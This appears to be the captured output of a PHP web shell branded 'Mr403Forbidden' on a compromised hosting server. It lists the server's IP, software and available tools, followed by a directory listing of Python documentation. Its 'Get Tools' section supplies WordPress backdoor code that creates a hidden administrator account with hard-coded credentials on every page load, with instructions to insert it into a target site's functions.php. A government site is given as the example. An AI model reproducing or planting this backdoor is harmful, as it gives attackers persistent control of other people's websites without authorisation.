./Mr403Forbidden

:/usr/share/doc/python2-docs/html/howto/ [ s--------- ]

System: Linux myhosting.zubahost.com 4.18.0-553.51.1.lve.1.el8.x86_64 #1 SMP Wed May 14 14:34:57 UTC 2025 x86_64
Software: LiteSpeed
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 194.163.174.55
Your IP: 216.73.216.138
User: business1 (1088) | Group: business1 (1091)
Safe Mode: OFF
MYSQL: OFF | PERL: ON | PYTHON: OFF | WGET: ON | CURL: ON | GCC: ON | PKEXEC: OFF
Disable Function:
mail

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = 'mr403forbidden@hotmail.com';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
argparse.html file 2019-03-27 12:19 77.83 KB root/root s---------
cporting.html file 2019-03-27 12:19 40.39 KB root/root s---------
curses.html file 2019-03-27 12:19 44.2 KB root/root s---------
descriptor.html file 2019-03-27 12:19 58.99 KB root/root s---------
doanddont.html file 2019-03-27 12:19 40.12 KB root/root s---------
functional.html file 2019-03-27 12:19 133.41 KB root/root s---------
index.html file 2019-03-27 12:19 7.72 KB root/root s---------
logging-cookbook.html file 2019-03-27 12:19 203.94 KB root/root s---------
logging.html file 2019-03-27 12:19 107.88 KB root/root s---------
pyporting.html file 2019-03-27 12:19 45.04 KB root/root s---------
regex.html file 2019-03-27 12:19 145.06 KB root/root s---------
sockets.html file 2019-03-27 12:19 41.03 KB root/root s---------
sorting.html file 2019-03-27 12:19 48.83 KB root/root s---------
unicode.html file 2019-03-27 12:19 69.12 KB root/root s---------
urllib2.html file 2019-03-27 12:19 63.65 KB root/root s---------
webservers.html file 2019-03-27 12:19 55.77 KB root/root s---------

© ./Mr403Forbidden